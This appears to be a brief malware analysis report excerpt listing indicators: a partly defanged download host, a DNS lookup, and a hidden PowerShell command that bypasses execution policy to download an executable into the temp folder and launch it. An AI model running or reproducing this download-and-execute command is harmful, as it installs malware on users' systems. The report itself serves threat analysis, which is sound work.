Technical Information
- http://po##it.net/vcv/0501973.exe as %temp+%\newfile.exe
- '<SYSTEM32>\cmd.exe' /c powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://po##it.net/vcv/0501973.exe',$env:Temp+'\newfile.Exe');(New-Object -com Shell....
- DNS ASK po##it.net
- '<SYSTEM32>\cmd.exe' /c powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://po##it.net/vcv/0501973.exe',$env:Temp+'\newfile.Exe');(New-Object -com Shell....' (with hidden window)